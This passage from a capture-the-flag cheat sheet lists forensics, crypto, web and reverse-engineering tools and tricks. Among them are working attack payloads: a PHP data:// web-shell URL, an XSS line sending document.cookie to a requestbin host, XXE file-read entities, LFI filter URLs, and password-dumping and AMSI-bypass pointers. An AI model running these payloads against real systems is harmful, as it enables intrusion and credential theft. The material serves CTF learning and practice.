[https://www.dcode.fr/hylian-language-breath-of-the-wild](https://www.dcode.fr/hylian-language-breath-of-the-wild). ![img/botw.jpg](img/botw.jpg) * Sheikah Language (Breathe of the Wild) The Sheikah language is another silly text-to-image encoder. This is the key, and you can find a decoder on [https://www.dcode.fr/sheikah-language](https://www.dcode.fr/sheikah-language). ![img/sheikah.png](img/sheikah.png) * Hexahue Alphabet The hexhue is an another tex-to-image enocder. you can find a decoder on [https://www.boxentriq.com/code-breaking/hexahue](https://www.boxentriq.com/code-breaking/hexahue) ![img](img/hexahue-alphabet.png) Networking --------------- * [Wireshark] The go-to tool for examining [`.pcap`][PCAP] files. * [Network Miner] Seriously cool tool that will try and scrape out images, files, credentials and other goods from [PCAP] and [PCAPNG] files. * [PCAPNG] Not all tools like the [PCAPNG] file format... so you can convert them with an online tool [http://pcapng.com/](http://pcapng.com/) or from the command-line with the `editcap` command that comes with installing [Wireshark]: ``` editcap old_file.pcapng new_file.pcap ``` * [`tcpflow`][tcpflow] A command-line tool for reorganizing packets in a PCAP file and getting files out of them. __Typically it gives no output, but it creates the files in your current directory!__ ``` tcpflow -r my_file.pcap ls -1t | head -5 # see the last 5 recently modified files ``` * [PcapXray] A GUI tool to visualize network traffic. PHP ------------ * Magic Hashes A common vulnerability in [PHP] that fakes hash "collisions..." where the `==` operator falls short in [PHP] type comparison, thinking everything that follows `0e` is considered scientific notation (and therefore 0). More valuable info can be found here: [https://github.com/spaze/hashes](https://github.com/spaze/hashes), but below are the most common breaks. | Plaintext | MD5 Hash | | --------- | -------- | |240610708|0e462097431906509019562988736854| |QLTHNDT|0e405967825401955372549139051580| |QNKCDZO|0e830400451993494058024219903391| |PJNPDWY|0e291529052894702774557631701704| |NWWKITQ|0e763082070976038347657360817689| |NOOPCJF|0e818888003657176127862245791911| |MMHUWUV|0e701732711630150438129209816536| |MAUXXQC|0e478478466848439040434801845361| |IHKFRNS|0e256160682445802696926137988570| |GZECLQZ|0e537612333747236407713628225676| |GGHMVOE|0e362766013028313274586933780773| |GEGHBXL|0e248776895502908863709684713578| |EEIZDOI|0e782601363539291779881938479162| |DYAXWCA|0e424759758842488633464374063001| |DQWRASX|0e742373665639232907775599582643| |BRTKUJZ|00e57640477961333848717747276704| |ABJIHVY|0e755264355178451322893275696586| |aaaXXAYW|0e540853622400160407992788832284| |aabg7XSs|0e087386482136013740957780965295| |aabC9RqS|0e041022518165728065344349536299| |0e215962017|0e291242476940776845150308577824| | Plaintext | SHA1 Hash | | --------- | --------- | |aaroZmOk|0e66507019969427134894567494305185566735| |aaK1STfY|0e76658526655756207688271159624026011393| |aaO8zKZF|0e89257456677279068558073954252716165668| |aa3OFF9m|0e36977786278517984959260394024281014729| | Plaintext | MD4 Hash | | --------- | --------- | |bhhkktQZ|0e949030067204812898914975918567| |0e001233333333333334557778889|0e434041524824285414215559233446| |0e00000111222333333666788888889|0e641853458593358523155449768529| |0001235666666688888888888|0e832225036643258141969031181899| * `preg_replace` A bug in older versions of [PHP] where the user could get remote code execution [http://php.net/manual/en/function.preg-replace.php](http://php.net/manual/en/function.preg-replace.php) * [`phpdc.phpr`][phpdc.phpr] A command-line tool to decode [`bcompiler`][bcompiler] compiled [PHP] code. * [`php://filter` for Local File Inclusion](https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/) A bug in [PHP] where if GET HTTP variables in the URL are controlling the navigation of the web page, perhaps the source code is `include`-ing other files to be served to the user. This can be manipulated by using [PHP filters](http://php.net/manual/en/filters.php) to potentially retrieve source code. Example like so: ``` http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index ``` * `data://text/plain;base64` A [PHP] stream that can be taken advantage of if used and evaluated as an `include` resource or evaluated. Can be used for RCE: check out this writeup: [https://ctftime.org/writeup/8868](https://ctftime.org/writeup/8868) ... TL;DR: ``` http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4= ``` PDF Files ------------- * `pdfinfo` A command-line tool to get a basic synopsis of what the [PDF] file is. * `pdfcrack` A comand-line tool to __recover a password from a PDF file.__ Supports dictionary wordlists and bruteforce. * `pdfimages` A command-line tool, the first thing to reach for when given a PDF file. It extracts the images stored in a PDF file, but it needs the name of an output directory (that it will create for) to place the found images. * [`pdfdetach`][pdfdetach] A command-line tool to extract files out of a [PDF]. Forensics ----------- * Python bytecode `uncompyle6` To decompile bytecode, use `uncompyle6`. There is one special argument (I think `-d` or something???) that can have success if the default operation does not work. Do not give up hope when working with obvious Python bytecode. EasyPythonDecompiler might work, or perhaps testing with `uncompyle` * Keepass `keepassx` can be installed on Ubuntu to open and explore Keepass databases. Keepass databases master passwords can be cracked with `keepass2john`. * [Magic Numbers] The starting values that identify a file format. These are often crucial for programs to properly read a certain file type, so they must be correct. If some files are acting strangely, try verifying their [magic number] with a [trusted list of file signatures](https://en.wikipedia.org/wiki/List_of_file_signatures). * [`hexed.it`][hexed.it] An online tool that allows you to modify the hexadecimal and binary values of an uploaded file. This is a good tool for correcting files with a corrupt [magic number] * [`dumpzilla`][dumpzilla] A [Python] script to examine a `.mozilla` configuration file, to examine downloads, bookmarks, history or bookmarks and registered passwords. Usage may be as such: ``` python dumpzilla.py .mozilla/firefox/c3a958fk.default/ --Downloads --History --Bookmarks --Passwords ``` * Repair image online tool Good low-hanging fruit to throw any image at: [https://online.officerecovery.com/pixrecovery/](https://online.officerecovery.com/pixrecovery/) * `foremost` A command-line tool to carve files out of another file. Usage is `foremost [filename]` and it will create an `output` directory. ``` sudo apt install foremost ``` * `binwalk` A command-line tool to carve files out of another file. Usage to extract is `binwalk -e [filename]` and it will create a `_[filename]_extracted` directory. ``` sudo apt install binwalk ``` * [`hachoir-subfile`][hachoir-subfile] A command-line tool to carve out files of another file. Very similar to the other tools like `binwalk` and `foremost`, but always try everything! * [TestDisk] A command-line tool, used to recover deleted files from a file system image. Handy to use if given a `.dd` and `.img` file etc. * [photorec] Another command-line utility that comes with `testdisk`. It is file data recovery software designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted. * [Analysis Image] ['https://29a.ch/photo-forensics/#forensic-magnifier'] Forensically is free online tool to analysis image this tool has many features like Magnifier, Clone Detection, Error Level analysis, Noise Analusis, level Sweep, Meta Data, Geo tags, Thumbnail Analysis , JPEG Analysis, Strings Extraction. PNG File Forensics -------------------- * `pngcheck` A command-line tool for "checking" a [PNG] image file. Especially good for verifying checksums. * [`pngcsum`](http://www.schaik.com/png/pngcsum/pngcsum-v01.tar.gz) Correct the CRC on all of the parts of a [PNG] image file. * [https://github.com/sherlly/PCRT](https://github.com/sherlly/PCRT) Utility to try and correct a [PNG] file. **NOTE... this will NOT SAVE your file as new one. YOU HAVE TO SHOW the file (enter y when using the script]) to actually view the new image.** APK Forensics --------------- * [`apktool`][apktool] A command-line tool to extract all the resources from an APK file. Usage: ``` apktool d <file.apk> ``` * [`dex2jar`][dex2jar] A command-line tool to convert a J.dex file to .class file and zip them as JAR files. * [`jd-gui`][jd-gui] A GUI tool to decompile Java code, and JAR files. Web ---------------- * `robots.txt` This file tries to hide webpages from web crawlers, like Google or Bing or Yahoo. A lot of sites try and use this mask sensitive files or folders, so it should always be some where you check during a CTF. [http://www.robotstxt.org/](http://www.robotstxt.org/) * [Edit This Cookie] A web browser plug-in that offers an easy interface to modifying [cookies]. ___THIS IS OFTEN OVERLOOKED, WITHOUT CHANGING THE VALUE OF THE COOKIES... BE SURE TO FUZZ EVERYTHING, INCLUDING COOKIE VALUES!___ * Backup pages ( `~` and `.bak` and `.swp` ) Some times you may be able to dig up an old version of a webpage (or some PHP source code!) by adding the usual backup suffixes. A good thing to check! * `/admin/` This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check. * `/.git/` A classic CTF challenge is to leave a `git` repository live and available on a website. You can see this with `nmap -A` (or whatever specific script catches it) and just by trying to view that specific folder, `/.git/`. A good command-line tool for this is [`GitDumper.sh`](https://github.com/internetwache/GitTools), or just simply using [`wget`][wget]. **Sometimes you might Bazaar or Mercurial or other distributed version control systems. You can use [https://github.com/kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) for those!!** * [`GitDumper.sh`][GitDumper.sh] A command-line tool that will automatically scrape and download a [git] repository hosted online with a given URL. * Bazaar `.bzr` If you see a publically accessible `.bzr` directory, you can use `bzr branch http://site output-directory` to download it. Or, use this utility: [https://github.com/kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) * [XSS]/[Cross-site scripting] [XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet). [Cross-site scripting], vulnerability where the user can control rendered [HTML] and ideally inject [JavaScript] code that could drive a browser to any other website or make any malicious network calls. Example test payload is as follows: ``` <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> ``` Typically you use this to steal cookies or other information, and you can do this with an online requestbin. ``` <img src="#" onerror="document.location='http://requestbin.fullcontact.com/168r30u1?c' + document.cookie"> ``` * new usefull XSS cheat sheet : 'https://portswigger.net/web-security/cross-site-scripting/cheat-sheet' * [CloudFlare Bypass](https://github.com/Anorov/cloudflare-scrape) If you need to script or automate against a page that uses the I'm Under Attack Mode from CloudFlare, or DDOS protection, you can do it like this with linked Python module. ``` python #!/usr/bin/env python import cfscrape url = 'http://yashit.tech/tryharder/' scraper = cfscrape.create_scraper() print scraper.get(url).content ``` * [XSStrike] A command-line tool for automated [XSS] attacks. Seems to function like how [sqlmap] does. * [`wpscan`][wpscan] * A Ruby script to scan and do reconnaissance on a [Wordpress] application. * Mac AutoLogin Password Cracking Sometimes, given an Mac autologin password file `/etc/kcpassword`, you can crack it with this code: ``` def kcpasswd(ciphertext): key = '7d895223d2bcddeaa3b91f' while len(key) < (len(ciphertext)*2): key = key + key key = binasciiunhexlify(key) result = '' for i in range(len(ciphertext)): result += chr(ord(ciphertext[i]) ^ (key[i])) return result ``` * XXE : XML External Entity An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server. We try to display the content of the file /flag : ``` <?xml version="1.0"?> <!DOCTYPE data [ <!ELEMENT data (#ANY)> <!ENTITY file SYSTEM "file:///flag"> ]> <data>&file;</data> <?xml version="1.0" encoding="UTF-16"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///flag" >]><foo>&xxe;</foo> ``` * Wordpress Password Hash Generator If you make it into a Wordpress database and can change passwords, reset the admin password to a new hash: [http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4](http://www.passwordtool.hu/wordpress-password-hash-generator-v3-v4). This will let you login to /wp-admin/ on the site. * Cookie Catcher * [`requestb.in`](https://requestb.in/) A free tool and online end-point that can be used to catch HTTP requests. Typically these are controlled and set by finding a [XSS] vulnerabilty. * [`hookbin.com`](https://hookbin.com/) A free tool and online end-point that can be used to catch HTTP requests. Typically these are controlled and set by finding a [XSS] vulnerabilty. * [`sqlmap`][sqlmap] A command-line tool written in [Python] to automatically detect and exploit vulnerable SQL injection points. * Flask Template Injection Try `{{config}}` to leak out the secret key, or start to climb up the Python MRO to acheive code execution. [https://nvisium.com/resources/blog/2015/12/07/injecting-flask.html](https://nvisium.com/resources/blog/2015/12/07/injecting-flask.html), [https://nvisium.com/resources/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html](https://nvisium.com/resources/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html), [https://nvisium.com/resources/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii.html](https://nvisium.com/resources/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii.html) * SQL `IF` statements These are handy for some injections and setting up some Blind SQL if you need to. Syntax is like `SELECT ( IF ( 1=1, "Condition successful!", "Condition errored!" ) )` * Explicit SQL Injection * Blind SQL Injection * MongoDB Get MongoDB properly installed: ``` sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 9DA31620334BD75D9DCB49F368818C72E52529D4 echo "deb [ arch=amd64,arm64 ] https://repo.mongodb.org/apt/ubuntu xenial/mongodb-org/4.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.0.list sudo apt-get update sudo apt-get install -y mongodb-org ``` Connect to a remote server with credentials: ``` mongo --username 'uname' -p 'pword' --host hostname.com:27017 ``` Print out the database info: ``` show databases use <databasename> show collections c = db.<collectioname> c.find() ``` * gobuster * DirBuster * `nikto` * Burpsuite * AWS / S3 Buckets You can try and dump an AWS bucket like so. The `--no-sign-request` avoids the need for credentials, and `--recursive` will grab everything possible. ``` aws s3 cp --recursive --no-sign-request s3://<bucket_name> . ``` i. e. `aws s3 cp --recursive --no-sign-request s3://tamuctf .` Reverse Engineering ------------------- * [ltrace](http://man7.org/linux/man-pages/man1/ltrace.1.html) and [strace](https://strace.io) Easy command-line tools to see some of the code being executed as you follow through a binary. Usage: `ltrace ./binary` * [Hopper](https://www.hopperapp.com) Hopper Disassembler, the reverse engineering tool that lets you disassemble, decompile and debug your applications. * [Binary Ninja](https://binary.ninja) Clean and easy with multithreaded analysis. Support multiple architectures, platforms, and compilers. * [gdb](https://en.wikipedia.org/wiki/GNU_Debugger) Fast and powerful debugger for UNIX system. More powerful if this tool is equipped with [PEDA](https://github.com/longld/peda). * [IDA](https://www.hex-rays.com/products/ida/support/download.shtml) It's one of popular debugger and disassembler tool with rich of features, cross platform, multi-processor disassembler. * [radare2](https://github.com/radareorg/radare2) Portable tool for hex editor, binary analysis, disassembler, debugger, etc. * [Ghidra](https://ghidra-sre.org/) New RE tool developed by NSA with the same feature as IDA * Compiling & running ASM code: You can convert ASM functions from assembly and run them as C functions like the following: `asm4.S` ```asm .intel_syntax noprefix .global asm4 asm4: push ebp mov ebp,esp push ebx sub esp,0x10 mov DWORD PTR [ebp-0x10],0x27d mov DWORD PTR [ebp-0xc],0x0 jmp label2 label1: add DWORD PTR [ebp-0xc],0x1 label2: mov edx,DWORD PTR [ebp-0xc] mov eax,DWORD PTR [ebp+0x8] add eax,edx movzx eax,BYTE PTR [eax] test al,al jne label1 mov DWORD PTR [ebp-0x8],0x1 jmp label3 label4: mov edx,DWORD PTR [ebp-0x8] mov eax,DWORD PTR [ebp+0x8] add eax,edx movzx eax,BYTE PTR [eax] movsx edx,al mov eax,DWORD PTR [ebp-0x8] lea ecx,[eax-0x1] mov eax,DWORD PTR [ebp+0x8] add eax,ecx movzx eax,BYTE PTR [eax] movsx eax,al sub edx,eax mov eax,edx mov edx,eax mov eax,DWORD PTR [ebp-0x10] lea ebx,[edx+eax*1] mov eax,DWORD PTR [ebp-0x8] lea edx,[eax+0x1] mov eax,DWORD PTR [ebp+0x8] add eax,edx movzx eax,BYTE PTR [eax] movsx edx,al mov ecx,DWORD PTR [ebp-0x8] mov eax,DWORD PTR [ebp+0x8] add eax,ecx movzx eax,BYTE PTR [eax] movsx eax,al sub edx,eax mov eax,edx add eax,ebx mov DWORD PTR [ebp-0x10],eax add DWORD PTR [ebp-0x8],0x1 label3: mov eax,DWORD PTR [ebp-0xc] sub eax,0x1 cmp DWORD PTR [ebp-0x8],eax jl label4 mov eax,DWORD PTR [ebp-0x10] add esp,0x10 pop ebx pop ebp ret ``` `asm4.c` ```c #include<stdio.h> extern int asm4(char* s); int main(){ char *str = "picoCTF_d899a"; printf("%X", asm4(str)); return 0; } ``` `bash` ```bash $ gcc -m32 -o a asm4.c asm4.S $ ./a ``` PowerShell ------------- * [nishang] A PowerShell suite of tools for pentesting. Has support for an ICMP reverse shell! * [Empire] HUGE PowerShell library and tool to do a lot of post-exploitation. * [Bypass AMSI Anti-Malware Scan Interface](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html?mkt_tok=eyJpIjoiWTJGaU5qbGlaVFZsTXpVdyIsInQiOiJBSXdzQm5FMGY0S1BrTWlBcVBlZ3ErN2NcL1RNeGkwcnNSK3FZcGVvaUhFRVJiQUhVcmVIWko0aWdNNCtXcVRrcWtDRTMxRGlpM1wvQlIxVHZlU1RUNk5sRVJnQ1dUZEFVQ0JTRHk4ejNVQTBWK1Y3Um1EWHZYdGY5YWQ5V2hTZFVXIn0%3D) Great tool and guide for anti-virus evasion with PowerShell. Windows Executables ------------- * [`pefile`][pefile] A [Python] module that examines the headers in a Windows [PE (Portable Executable)][PE] file. * [dnSpy] A [Windows] GUI tool to decompile and reverse engineer [.NET] binaries * [PEiD][PEiD] A [Windows] tool to detect common packers, cryptors and compilers for [Windows][Windows] [PE][PE] * jetBrains .NET decompiler * AutoIT converter When debugging AutoIT programs, you may get a notification: "This is a compiled AutoIT script". Here is a good thing to use to decode them: [https://www.autoitscript.com/site/autoit/downloads/](https://www.autoitscript.com/site/autoit/downloads/) Python Reversing ------------ * [Easy Python Decompiler](https://sourceforge.net/projects/easypythondecompiler/) A small `.exe` GUI application that will "decompile" [Python] bytecode, often seen in `.pyc` extension. The tool runs reliably on [Linux] with [Wine]. * [Pyinstaller Extractor](https://github.com/extremecoders-re/pyinstxtractor) PyInstaller Extractor is a Python script to extract the contents of a PyInstaller generated Windows executable file. The contents of the pyz file (usually pyc files) present inside the executable are also extracted. Usage is `python3 pyinstxtractor.py <filename>`. We can later decompile the bytecode in `.pyc` using [uncompyle6](https://github.com/No-Cellist-7780/ctf-katana#forensics) Binary Exploitation/pwn -------------- * Basic Stack Overflow Use `readelf -s <binary>` to get the location of a function to jump to -- overflow in Python, find offset with `dmesg`, and jump. * `printf` vulnerability A C binary vulnerability, where `printf` is used with user-supplied input without any arguments. Hand-made code to exploit and overwrite functions: [https://pastebin.com/0r4WGn3D](https://pastebin.com/0r4WGn3D) and a video walkthrough explaining: [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4) * [`formatStringExploiter`][formatStringExploiter] A good [Python] module to streamline exploiting a [format string vulnerability]. THIS IS NOT ALWAYS A GOOD TACTIC... * 64-bit Buffer Overflow 64-bit buffer overflow challenges are often difficult because the null bytes get in the way of memory addresses (for the function you want to jump to, that you can usually find with `readelf -s`). But, check if whether or not the function address you need starts with the same hex values already on the stack (in `rsp`). Maybe you only have to write two or three bytes after the overflow, rather than the whole function address. Miscellaneous ---------- * [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings) Super useful repo that has a payload for basically every sceario * Punchcards(/Punch cards) Sometimes it sucks to do these manually, but you can here: [http://tyleregeto.com/article/punch-card-emulator](http://tyleregeto.com/article/punch-card-emulator) * GameBoy ROMS You have options to run GameBoy ROMs... one is using VisualBoyAdvance, the oher is RetroArch (which is supposedly better): ``` # VisualBoyAdvance sudo add-apt-repository universe sudo apt install visualboyadvance # RetroArch sudo add-apt-repository ppa:libretro/stable && sudo apt-get update && sudo apt-get install -y retroarch* libretro-* ``` * References to DICE, or EFF If your challenges references "EFF" or includes dice in some way, or showcases numbers 1-6 of length 5, try [https://www.eff.org/dice](https://www.eff.org/dice). This could refer to a passphrase generated by dice rolls available here: [https://www.eff.org/files/2016/07/18/eff_large_wordlist.txt](https://www.eff.org/files/2016/07/18/eff_large_wordlist.txt) * [Base64], [Base32], [Base85], [Base91] ``` Base64: TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4= ``` ``` Base32 ORUGS4ZANFZSAYLOEBSXQYLNOBWGKIDPMYQGEYLTMUZTELRANF2CA2LTEB3GS43JMJWGKIDCPEQGY33UOMQG6ZRAMNQXA2LUMFWCA3DFOR2GK4TTEBQW4ZBANVXXEZJAMVYXKYLMOMQHG2LHNZZSAZTPOIQHAYLEMRUW4ZZMEBSXQ5DSME====== ``` ``` Base85: <~9jqo^BlbD-BleB1DJ+*+F(f,q/0JhKF<GL>[email protected]$d7F!,L7@<6@)/0JDEF<G%<+EV:2F!, O<DJ+*.@<*K0@<6L(Df-\0Ec5e;DffZ(EZee.Bl.9pF"AGXBPCsi+DGm>@3BB/F*&OCAfu2/AKY i(DIb:@FD,*)+C]U=@3BN#EcYf8ATD3s@q?d$AftVqCh[NqF<G:8+EV:.+Cf>-FD5W8ARlolDIa l(DId<j@<?3r@:F%a+D58'ATD4$Bl@l3De:,-DJs`8ARoFb/0JMK@qB4^F!,R<AKZ&-DfTqBG%G >uD.RTpAKYo'+CT/5+Cei#DII?(E,9)oF*2M7/c~> ``` ``` Base91: 8D$J`/wC4!c.hQ;mT8,<p/&Y/H@$]xlL3oDg<W.0$FW6GFMo_D8=8=}AMf][|LfVd/<P1o/1Z2(.I+LR6tQQ0o1a/2/WtN3$3t[x&k)zgZ5=p;LRe.{B[pqa(I.WRT%yxtB92oZB,2,Wzv;Rr#N.cju"JFXiZBMf<WMC&$@+e95p)z01_*UCxT0t88Km=UQJ;WH[#F]4pE>i3o(g7=$e7R2u>xjLxoefB.6Yy#~uex8jEU_1e,MIr%!&=EHnLBn2h>M+;Rl3qxcL5)Wfc,HT$F]4pEsofrFK;W&eh#=#},|iKB,2,W]@fVlx,a<m;i=CY<=Hb%}+},F ``` * [Base65535](https://github.com/qntm/base65536) Unicode characters encoding. Includes a lot of seemingly random spaces and chinese characters! ``` 𤇃𢊻𤄻嶜𤄋𤇁𡊻𤄛𤆬𠲻𤆻𠆜𢮻𤆻ꊌ𢪻𤆻邌𤆻𤊻𤅋𤲥𣾻𤄋𥆸𣊻𤅛ꊌ𤆻𤆱炼綻𤋅𤅴薹𣪻𣊻𣽻𤇆𤚢𣺻赈𤇣綹𤻈𤇣𤾺𤇃悺𢦻𤂻𤅠㢹𣾻𤄛𤆓𤦹𤊻𤄰炜傼𤞻𢊻𣲻𣺻ꉌ邹𡊻𣹫𤅋𤇅𣾻𤇄𓎜𠚻𤊻𢊻𤉛𤅫𤂑𤃃𡉌𤵛𣹛𤁐𢉋𡉻𡡫𤇠𠞗𤇡𡊄𡒌𣼻燉𣼋𦄘炸邹㢸𠞻𠦻𡊻𣈻𡈻𣈛𡈛ꊺ𠆼𤂅𣻆𣫃𤮺𤊻𡉋㽻𣺬𣈛𡈋𤭻𤂲𣈻𤭻𤊼𢈛儛𡈛ᔺ ``` * [Base41](https://github.com/sveljko/base41/blob/master/python/base41.py) * Mac / Macintosh / Apple Hidden Files `.DS_Store` [ds_store_exp](https://github.com/lijiejie/ds_store_exp) On Mac computers, there is a hidden index file `.DS_Store`. You might be able to find it if you have an LFI vulnerability or something of the like. A good tool to track these down on a website is the DS_Store Exposer: [https://github.com/lijiejie/ds_store_exp](https://github.com/lijiejie/ds_store_exp). * Wordsearches Some CTFs have me solve wordsearchs as part of a challenge (TJCTF 2018). This code is super helpful: [https://github.com/robbiebarrat/word-search](https://github.com/robbiebarrat/word-search) * "Unflattening" Base64 in lowercase or uppercase Some time ago we needed to recover the original Base64 string from one that is in all lowercase or all uppercase. Caleb wrote a good script to smartly do this: [https://pastebin.com/HprZcHrY](https://pastebin.com/HprZcHrY) * Password-protected Zip Files: [`fcrackzip`][fcrackzip] and `zip2john.py` Use * 15 Puzzle A sliding puzzle that consists of a 4x4 grid with numbered square tiles, with one missing, set in a random order. It was involved in SharifCTF to determine if a group of these puzzles was solvable: [https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/](https://theromanxpl0it.github.io/ctf_sharifctf18/fifteenpuzzle/) * SETUID Binary Methodology Don't forget to check "simple" things --- it doesn't need to be a pwn or binary exploitation challenge, keep in mind IT DOES NOT use a secure PATH like `sudo`. * Chrome Password Dump A [Windows] command-line tool to dump passwords saved with Google Chrome. [http://securityxploded.com/chrome-password-dump.php](http://securityxploded.com/chrome-password-dump.php) * `img2txt` A command-line tool to convert an image into ASCII for the terminal. Can be installed like so: ``` sudo apt install -y caca-utils ``` * Strange Symbols/Characters Some CTFs will try and hide a message on a picture with strange symbols. Try and Google Reverse Image searching these. They may be Egyptian Characters: ![http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif](http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif) * Bitcoin You might see a private Bitcoin key as a base64 encoded SHA256 hash, like this: ``` NWEyYTk5ZDNiYWEwN2JmYmQwOGI5NjEyMDVkY2FlODg3ZmIwYWNmOWYyNzI5MjliYWE3OTExZmFhNGFlNzc1MQ== ``` Decoded, it is a hash: `5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751`. If you can find an AES ECB key along with (usually represented in hex or another encoding), you can decipher like so: ``` openssl enc -d -aes-256-ecb -in <(printf %s '5a2a99d3baa07bfbd08b961205dcae887fb0acf9f272929baa7911faa4ae7751' | xxd -r -p) -K '6fb3b5b05966fb06518ce6706ec933e79cfaea8f12b4485cba56321c7a62a077' MCA{I$love$bitcoin$so$much!} ``` * Missing `ls` or `dir` commands If you cannot run `ls` or `dir`, or `find` or `grep`, to list files you can use ``` echo * echo /any/path/* ``` * restricted bash (`rbash`) read files If you are a restricted shell like `rbash` you can still read any file with some builtin commands like `mapfile`: ``` mapfile -t < /etc/passwd printf "$s\n" "${anything[@]}" ``` Jail Breaks ---------- Sometimes you're jailed in an environment where you can potentially execute code. * Python 3 `().__class__.__base__.__subclasses__()` - Gives access to `object` subclasses Trivia ------------- * Trivia Question: a reliable mechanism for websites to remember stateful information. Yummy! ``` Cookie ``` * A group of binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation ``` base64 ``` * This CVE Proof of concept Shows NSA.gov playing "Never Gonna Give You Up," by 1980s heart-throb Rick Astley. ``` CVE-2020-0601 ``` * The British used this machine to crack the German Enigma machine messages. ``` Bombe ``` * What is the Windows LM hash for a blank password? ``` aad3b435b51404eeaad3b435b51404ee ``` * for Windows LM hashing, after the password is split into two 7 character chunks, they are used as DES keys to encrypt what string? ``` KGS!@#$% ``` * I am the person responsible for stopping one of the worst ransomware. Who am I? ``` MalwareTech ``` * I am used by devices for sending error messages. Who am I? ``` ICMP ``` * We are a CTF team which is open to everybody. Who are we? ``` OpenToAll - https://opentoallctf.github.io/ ``` [steghide]: http://steghide.sourceforge.net/ [snow]: http://www.darkside.com.au/snow/ [cribdrag.py]: https://github.com/SpiderLabs/cribdrag [cribdrag]: https://github.com/SpiderLabs/cribdrag [pcap]: https://en.wikipedia.org/wiki/Pcap [PCAP]: https://en.wikipedia.org/wiki/Pcap [Wireshark]: https://www.wireshark.org/ [Network Miner]: http://www.netresec.com/?page=NetworkMiner [PCAPNG]: https://github.com/pcapng/pcapng [pcapng]: https://github.com/pcapng/pcapng [pdfcrack]: http://pdfcrack.sourceforge.net/index.html [GitDumper.sh]: https://github.com/internetwache/GitTools [pefile]: https://github.com/erocarrera/pefile [Python]: https://www.python.org/ [PE]: https://en.wikipedia.org/wiki/Portable_Executable [Portable Executable]: https://en.wikipedia.org/wiki/Portable_Executable [hipshot]: https://bitbucket.org/eliteraspberries/hipshot [QR code]: https://en.wikipedia.org/wiki/QR_code [QR codes]: https://en.wikipedia.org/wiki/QR_code [QR]: https://en.wikipedia.org/wiki/QR_code [zbarimg]: https://linux.die.net/man/1/zbarimg [Linux]: https://en.wikipedia.org/wiki/Linux [Ubuntu]: https://en.wikipedia.org/wiki/Ubuntu_(operating_system) [Wine]: https://en.wikipedia.org/wiki/Wine_(software) [Detect DTMF Tones]: http://dialabc.com/sound/detect/index.html [dnSpy]: https://github.com/0xd4d/dnSpy [Windows]: https://en.wikipedia.org/wiki/Microsoft_Windows [.NET]: https://en.wikipedia.org/wiki/.NET_Framework [Vigenere Cipher]: https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher [PDF]: https://en.wikipedia.org/wiki/Portable_Document_Format [Playfair Cipher]: https://en.wikipedia.org/wiki/Playfair_cipher [phpdc.phpr]:https://github.com/lighttpd/xcache/blob/master/bin/phpdc.phpr [bcompiler]: http://php.net/manual/en/book.bcompiler.php [PHP]: https://en.wikipedia.org/wiki/PHP [GET]: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol#Request_methods [pdfdetach]: https://www.systutorials.com/docs/linux/man/1-pdfdetach/ [sqlmap]: https://github.com/sqlmapproject/sqlmap [hachoir-subfile]: https://pypi.python.org/pypi/hachoir-subfile/0.5.3 [wget]: https://en.wikipedia.org/wiki/Wget [git]: https://git-scm.com/ [Cross-site scripting]: https://en.wikipedia.org/wiki/Cross-site_scripting [XSS]: https://en.wikipedia.org/wiki/Cross-site_scripting [HTML]: https://en.wikipedia.org/wiki/HTML [JavaScript]: https://en.wikipedia.org/wiki/JavaScript [PEiD]: https://www.aldeid.com/wiki/PEiD [wpscan]: https://wpscan.org/ [Ruby]: https://www.ruby-lang.org/en/ [Wordpress]: https://en.wikipedia.org/wiki/WordPress [dumpzilla]: http://www.dumpzilla.org/ [hexed.it]: https://hexed.it/ [Magic Numbers]: https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files [Magic Number]: https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files [Edit 